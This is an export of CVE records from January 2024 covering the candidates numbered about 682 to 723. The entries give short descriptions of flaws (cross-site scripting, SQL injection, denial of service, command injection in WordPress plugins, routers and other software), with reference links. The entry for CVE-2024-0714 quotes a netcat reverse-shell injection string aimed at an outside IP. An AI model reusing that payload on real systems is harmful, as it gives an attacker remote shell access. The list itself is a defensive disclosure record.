CVE    2024    723    Candidate    A vulnerability was found in freeSSHd 1.0.9 on Windows. It has been classified as problematic. This affects an unknown part. The manipulation leads to denial of service. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251547.    MISC:https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176545/freeSSHd-1.0.9-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.251547   |   URL:https://vuldb.com/?ctiid.251547   |   MISC:https://vuldb.com/?id.251547   |   URL:https://vuldb.com/?id.251547    Assigned (20240119)
CVE    2024    722    Candidate    A vulnerability was found in code-projects Social Networking Site 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file message.php of the component Message Page. The manipulation of the argument Story leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251546 is the identifier assigned to this vulnerability.    MISC:https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link   |   URL:https://drive.google.com/file/d/1r-4P-gWuIxuVL2QdOXsqN6OTRtQEmo7P/view?usp=drive_link   |   MISC:https://vuldb.com/?ctiid.251546   |   URL:https://vuldb.com/?ctiid.251546   |   MISC:https://vuldb.com/?id.251546   |   URL:https://vuldb.com/?id.251546    Assigned (20240119)
CVE    2024    721    Candidate    A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability.    MISC:https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf   |   URL:https://github.com/sweatxi/BugHub/blob/main/jspXCMS-%20Survey%20label.pdf   |   MISC:https://vuldb.com/?ctiid.251545   |   URL:https://vuldb.com/?ctiid.251545   |   MISC:https://vuldb.com/?id.251545   |   URL:https://vuldb.com/?id.251545    Assigned (20240119)
CVE    2024    720    Candidate    A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link   |   URL:https://drive.google.com/drive/folders/1ZFjWlD5axvhWp--I7tuiZ9uOpSBmU_f6?usp=drive_link   |   MISC:https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720   |   URL:https://github.com/beraoudabdelkhalek/research/tree/main/CVEs/CVE-2024-0720   |   MISC:https://vuldb.com/?ctiid.251544   |   URL:https://vuldb.com/?ctiid.251544   |   MISC:https://vuldb.com/?id.251544   |   URL:https://vuldb.com/?id.251544    Assigned (20240119)
CVE    2024    719    Candidate    The Tabs Shortcode and Widget WordPress plugin through 1.17 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.    MISC:https://wpscan.com/vulnerability/6e67bf7f-07e6-432b-a8f4-aa69299aecaf/   |   URL:https://wpscan.com/vulnerability/6e67bf7f-07e6-432b-a8f4-aa69299aecaf/    Assigned (20240119)
CVE    2024    718    Candidate    A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543.    MISC:https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md   |   URL:https://github.com/biantaibao/zhglxt_xss/blob/main/xss.md   |   MISC:https://vuldb.com/?ctiid.251543   |   URL:https://vuldb.com/?ctiid.251543   |   MISC:https://vuldb.com/?id.251543   |   URL:https://vuldb.com/?id.251543    Assigned (20240119)
CVE    2024    717    Candidate    A vulnerability classified as critical was found in D-Link DAP-1360, DIR-300, DIR-615, DIR-615GF, DIR-615S, DIR-615T, DIR-620, DIR-620S, DIR-806A, DIR-815, DIR-815AC, DIR-815S, DIR-816, DIR-820, DIR-822, DIR-825, DIR-825AC, DIR-825ACF, DIR-825ACG1, DIR-841, DIR-842, DIR-842S, DIR-843, DIR-853, DIR-878, DIR-882, DIR-1210, DIR-1260, DIR-2150, DIR-X1530, DIR-X1860, DSL-224, DSL-245GR, DSL-2640U, DSL-2750U, DSL-G2452GR, DVG-5402G, DVG-5402G, DVG-5402GFRU, DVG-N5402G, DVG-N5402G-IL, DWM-312W, DWM-321, DWR-921, DWR-953 and Good Line Router v2 up to 20240112. This vulnerability affects unknown code of the file /devinfo of the component HTTP GET Request Handler. The manipulation of the argument area with the input notice|net|version leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-251542 is the identifier assigned to this vulnerability.    MISC:https://github.com/999zzzzz/D-Link   |   URL:https://github.com/999zzzzz/D-Link   |   MISC:https://vuldb.com/?ctiid.251542   |   URL:https://vuldb.com/?ctiid.251542   |   MISC:https://vuldb.com/?id.251542   |   URL:https://vuldb.com/?id.251542    Assigned (20240119)
CVE    2024    716    Candidate    A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is said to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md   |   URL:https://github.com/GTA12138/vul/blob/main/smart%20s150/s150%20Download%20any%20file/smart%20s150%20download%20any%20file.md   |   MISC:https://vuldb.com/?ctiid.251541   |   URL:https://vuldb.com/?ctiid.251541   |   MISC:https://vuldb.com/?id.251541   |   URL:https://vuldb.com/?id.251541    Assigned (20240119)
CVE    2024    715    Candidate    Expression Language Injection vulnerability in Hitachi Global Link Manager on Windows allows Code Injection. This issue affects Hitachi Global Link Manager: before 8.8.7-03.    MISC:https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-112/index.html   |   URL:https://www.hitachi.com/products/it/software/security/info/vuls/hitachi-sec-2024-112/index.html    Assigned (20240119)
CVE    2024    714    Candidate    A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://vuldb.com/?ctiid.251540   |   URL:https://vuldb.com/?ctiid.251540   |   MISC:https://vuldb.com/?id.251540   |   URL:https://vuldb.com/?id.251540    Assigned (20240119)
CVE    2024    713    Candidate    A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://drive.google.com/file/d/1C6_4A-96BtR9VTNSadUY09ErroqLEVJ4/view?usp=sharing   |   URL:https://drive.google.com/file/d/1C6_4A-96BtR9VTNSadUY09ErroqLEVJ4/view?usp=sharing   |   MISC:https://vuldb.com/?ctiid.251539   |   URL:https://vuldb.com/?ctiid.251539   |   MISC:https://vuldb.com/?id.251539   |   URL:https://vuldb.com/?id.251539    Assigned (20240119)
CVE    2024    712    Candidate    A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md   |   URL:https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md   |   MISC:https://vuldb.com/?ctiid.251538   |   URL:https://vuldb.com/?ctiid.251538   |   MISC:https://vuldb.com/?id.251538   |   URL:https://vuldb.com/?id.251538    Assigned (20240119)
CVE    2024    711    Candidate    The Buttons Shortcode and Widget WordPress plugin through 1.16 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.    MISC:https://wpscan.com/vulnerability/8e286c04-ef32-4af0-be78-d978999b2a90/   |   URL:https://wpscan.com/vulnerability/8e286c04-ef32-4af0-be78-d978999b2a90/    Assigned (20240119)
CVE    2024    709    Candidate    The Cryptocurrency Widgets – Price Ticker & Coins List plugin for WordPress is vulnerable to SQL Injection via the 'coinslist' parameter in versions 2.0 to 2.6.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172   |   URL:https://plugins.trac.wordpress.org/browser/cryptocurrency-price-ticker-widget/trunk/includes/ccpw-db-helper.php?rev=3003658#L172   |   MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024040%40cryptocurrency-price-ticker-widget&new=3024040%40cryptocurrency-price-ticker-widget&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0603621-4521-4eb0-b4dd-e2257c133cee?source=cve    Assigned (20240118)
CVE    2024    708    Candidate    The Landing Page Cat – Coming Soon Page, Maintenance Page & Squeeze Pages plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.7.2. This makes it possible for unauthenticated attackers to access landing pages that may not be public.    MISC:https://plugins.trac.wordpress.org/changeset/3034324/landing-page-cat/trunk/includes/landing/landing.php   |   URL:https://plugins.trac.wordpress.org/changeset/3034324/landing-page-cat/trunk/includes/landing/landing.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7b34f50a-4d2d-49b8-86e4-0416c8be202b?source=cve    Assigned (20240118)
CVE    2024    707    Candidate    ** REJECT ** Not a valid vulnerability.        Assigned (20240118)
CVE    2024    706    Candidate    ** REJECT ** This was a false positive report.        Assigned (20240118)
CVE    2024    705    Candidate    The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve    Assigned (20240118)
CVE    2024    704    Candidate    ** REJECT ** very low impact - impractical to correct        Assigned (20240118)
CVE    2024    703    Candidate    The Sticky Buttons – floating buttons builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via sticky URLs in all versions up to, and including, 3.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024941%40sticky-buttons&new=3024941%40sticky-buttons&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c070be-e955-4076-9878-0b1044766397?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b3c070be-e955-4076-9878-0b1044766397?source=cve    Assigned (20240118)
CVE    2024    702    Candidate    The Oliver POS – A WooCommerce Point of Sale (POS) plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions hooked via AJAX in the includes/class-pos-bridge-install.php file in all versions up to, and including, 2.4.1.8. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform several unauthorized actions like deactivating the plugin, disconnecting the subscription, syncing the status and more.    MISC:https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-install.php#L11   |   URL:https://plugins.trac.wordpress.org/browser/oliver-pos/trunk/includes/class-pos-bridge-install.php#L11   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b5c6f351-477b-4384-9863-fe3b45ddf21d?source=cve    Assigned (20240118)
CVE    2024    701    Candidate    The UserPro plugin for WordPress is vulnerable to Security Feature Bypass in all versions up to, and including, 5.1.6. This is due to the use of client-side restrictions to enforce the 'Disabled registration' Membership feature within the plugin's General settings. This makes it possible for unauthenticated attackers to register an account even when account registration has been disabled by an administrator.    MISC:https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681   |   URL:https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ea070d9c-c04c-432f-a110-47b9eaa67614?source=cve    Assigned (20240118)
CVE    2024    700    Candidate    The Simple Tweet plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Tweet this text value in all versions up to, and including, 1.4.0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://github.com/wTeBwAA/PoC-SimpleTweet/blob/main/POST-request   |   URL:https://github.com/wTeBwAA/PoC-SimpleTweet/blob/main/POST-request   |   MISC:https://wordpress.org/plugins/simple-tweet/   |   URL:https://wordpress.org/plugins/simple-tweet/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/a5da021c-3835-4251-a3e5-3b5aaa11ea14?source=cve    Assigned (20240118)
CVE    2024    699    Candidate    The AI Engine: Chatbots, Generators, Assistants, GPT 4 and more! plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'add_image_from_url' function in all versions up to, and including, 2.1.4. This makes it possible for authenticated attackers, with Editor access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.    MISC:https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php   |   URL:https://plugins.trac.wordpress.org/changeset/3021494/ai-engine/trunk/classes/core.php   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0a86f6ed-9755-4265-bc0d-2d0e18e9982f?source=cve    Assigned (20240118)
CVE    2024    698    Candidate    The Easy!Appointments plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/browser/easyappointments/trunk/public/class-easyappointments-public.php#L141   |   URL:https://plugins.trac.wordpress.org/browser/easyappointments/trunk/public/class-easyappointments-public.php#L141   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4b002e40-712d-4c3f-b168-9132e7b77e60?source=cve    Assigned (20240118)
CVE    2024    697    Candidate    The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.3 via the node_id parameter in the backuply_get_jstree function. This makes it possible for attackers with administrator privileges or higher to read the contents of arbitrary files on the server, which can contain sensitive information.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3026806%40backuply&new=3026806%40backuply&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/70effa22-fbf6-44cb-9d1b-8625969c10ac?source=cve    Assigned (20240118)
CVE    2024    696    Candidate    A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://pasteboard.co/wsTTLjp5UEPq.png   |   URL:https://pasteboard.co/wsTTLjp5UEPq.png   |   MISC:https://vuldb.com/?ctiid.251481   |   URL:https://vuldb.com/?ctiid.251481   |   MISC:https://vuldb.com/?id.251481   |   URL:https://vuldb.com/?id.251481    Assigned (20240118)
CVE    2024    695    Candidate    A vulnerability, which was classified as problematic, has been found in EFS Easy Chat Server 3.1. Affected by this issue is some unknown functionality of the component HTTP GET Request Handler. The manipulation of the argument USERNAME leads to denial of service. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251480. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://packetstormsecurity.com/files/176381/Easy-Chat-Server-3.1-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176381/Easy-Chat-Server-3.1-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.251480   |   URL:https://vuldb.com/?ctiid.251480   |   MISC:https://vuldb.com/?id.251480   |   URL:https://vuldb.com/?id.251480   |   MISC:https://www.exploitalert.com/view-details.html?id=40072   |   URL:https://www.exploitalert.com/view-details.html?id=40072   |   MISC:https://www.youtube.com/watch?v=nGyS2Rp5aEo   |   URL:https://www.youtube.com/watch?v=nGyS2Rp5aEo    Assigned (20240118)
CVE    2024    694    Candidate    ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2023-6620. Reason: This candidate is a reservation duplicate of CVE-2023-6620. Notes: All CVE users should reference CVE-2023-6620 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.        Assigned (20240118)
CVE    2024    693    Candidate    A vulnerability classified as problematic was found in EFS Easy File Sharing FTP 2.0. Affected by this vulnerability is an unknown functionality. The manipulation of the argument username leads to denial of service. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251479. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.    MISC:https://0day.today/exploit/description/39218   |   URL:https://0day.today/exploit/description/39218   |   MISC:https://packetstormsecurity.com/files/176377/Easy-File-Sharing-FTP-Server-2.0-Denial-Of-Service.html   |   URL:https://packetstormsecurity.com/files/176377/Easy-File-Sharing-FTP-Server-2.0-Denial-Of-Service.html   |   MISC:https://vuldb.com/?ctiid.251479   |   URL:https://vuldb.com/?ctiid.251479   |   MISC:https://vuldb.com/?id.251479   |   URL:https://vuldb.com/?id.251479   |   MISC:https://www.youtube.com/watch?v=Rcl6VWg_bPY   |   URL:https://www.youtube.com/watch?v=Rcl6VWg_bPY    Assigned (20240118)
CVE    2024    692    Candidate    The SolarWinds Security Event Manager was susceptible to Remote Code Execution Vulnerability. This vulnerability allows an unauthenticated user to abuse SolarWinds’ service, resulting in remote code execution.    MISC:https://documentation.solarwinds.com/en/success_center/sem/content/release_notes/sem_2023-4-1_release_notes.htm   |   URL:https://documentation.solarwinds.com/en/success_center/sem/content/release_notes/sem_2023-4-1_release_notes.htm   |   MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-0692   |   URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-0692    Assigned (20240118)
CVE    2024    691    Candidate    The FileBird plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported folder titles in all versions up to, and including, 5.5.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. It may also be possible to socially engineer an administrator into uploading a malicious folder import.    MISC:https://plugins.trac.wordpress.org/changeset/3023924/filebird   |   URL:https://plugins.trac.wordpress.org/changeset/3023924/filebird   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve    Assigned (20240118)
CVE    2024    690    Candidate    An information disclosure flaw was found in ansible-core due to a failure to respect the ANSIBLE_NO_LOG configuration in some scenarios. Information is still included in the output in certain tasks, such as loop items. Depending on the task, this issue may include sensitive information, such as decrypted secret values.    MISC:RHBZ#2259013   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2259013   |   MISC:RHSA-2024:0733   |   URL:https://access.redhat.com/errata/RHSA-2024:0733   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0690   |   URL:https://access.redhat.com/security/cve/CVE-2024-0690   |   MISC:https://github.com/ansible/ansible/pull/82565   |   URL:https://github.com/ansible/ansible/pull/82565    Assigned (20240118)
CVE    2024    689    Candidate    The Custom Field Suite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a meta import in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on the meta values. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3042177%40custom-field-suite&new=3042177%40custom-field-suite&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d8e967ce-fd36-44de-acca-c1985642ee5b?source=cve    Assigned (20240118)
CVE    2024    688    Candidate    The "WebSub (FKA. PubSubHubbub)" plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve    Assigned (20240118)
CVE    2024    687    Candidate    The Restrict User Access – Ultimate Membership & Content Protection plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via API. This makes it possible for unauthenticated attackers to obtain the contents of posts and pages via API.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve    Assigned (20240118)
CVE    2024    686    Candidate    ** REJECT ** Incorrect assignment        Assigned (20240118)
CVE    2024    685    Candidate    The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export.    MISC:https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php   |   URL:https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php   |   MISC:https://sec.stealthcopter.com/ninja-contact-forms/   |   URL:https://sec.stealthcopter.com/ninja-contact-forms/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve    Assigned (20240118)
CVE    2024    684    Candidate    A flaw was found in the GNU coreutils "split" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service.    MISC:RHBZ#2258948   |   URL:https://bugzilla.redhat.com/show_bug.cgi?id=2258948   |   MISC:https://access.redhat.com/security/cve/CVE-2024-0684   |   URL:https://access.redhat.com/security/cve/CVE-2024-0684   |   MISC:https://www.openwall.com/lists/oss-security/2024/01/18/2   |   URL:https://www.openwall.com/lists/oss-security/2024/01/18/2    Assigned (20240118)
CVE    2024    683    Candidate    The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in all versions up to, and including, 3.0.14. This makes it possible for unauthenticated and authenticated attackers, with subscriber-level access and above, to generate and delete labels.    MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=   |   URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/be759c83-a9df-4858-a724-28006a595404?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/be759c83-a9df-4858-a724-28006a595404?source=cve    Assigned (20240118)
CVE    2024    682    Candidate    The Page Restrict plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 2.5.5. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts.    MISC:https://wordpress.org/plugins/pagerestrict/   |   URL:https://wordpress.org/plugins/pagerestrict/   |   MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve   |   URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve    Assigned (20240118)
